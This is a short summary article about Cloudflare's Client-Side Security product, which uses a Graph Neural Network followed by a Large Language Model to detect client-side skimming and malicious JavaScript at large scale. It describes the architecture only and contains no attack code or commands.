This article details Cloudflare's Client-Side Security product, focusing on its architecture for detecting client-side skimming and malicious JavaScript. It highlights a novel two-stage detection pipeline combining a Graph Neural Network (GNN) for high recall with a Large Language Model (LLM) for drastically reducing false positives at scale. The system processes billions of scripts daily, providing insights into distributed security, AI/ML integration in production, and large-scale data processing for threat detection.
Read original on Cloudflare BlogClient-side skimming attacks, often involving malicious JavaScript injection, pose a significant threat because they can operate stealthily without disrupting user experience. Detecting these threats at Cloudflare's scale—assessing 3.5 billion scripts daily across thousands of enterprise zones—is a massive data and computational problem. The sheer volume and high volatility of JavaScript code (roughly a third of scripts update monthly) make manual review impossible and traditional signature-based detection insufficient for zero-day threats. The system needs to discern malicious intent from benign but complex or obfuscated code, a task complicated by a severe class imbalance where benign scripts are infinitely diverse compared to known malicious samples.
Cloudflare's solution is a sophisticated cascading classifier architecture that leverages both a Graph Neural Network (GNN) and a Large Language Model (LLM) to achieve both high recall for new threats and extremely low false positive rates. This pipeline is crucial for maintaining effective security without overwhelming customers with alerts. The system collects signals using browser reporting (e.g., Content Security Policy) without requiring app instrumentation or adding latency.
Architectural Lesson: Hybrid AI for Scale and Accuracy
This Cloudflare architecture demonstrates a powerful pattern for integrating AI in production: combining a specialized, high-recall model (GNN) for initial screening with a more general, high-precision model (LLM) for refinement. This hybrid approach optimizes both performance (most traffic bypasses the LLM) and accuracy, effectively tackling the class imbalance problem inherent in anomaly detection at massive scale. Leveraging existing infrastructure like Workers AI and R2 for ML inference and logging further exemplifies efficient resource utilization in a distributed system.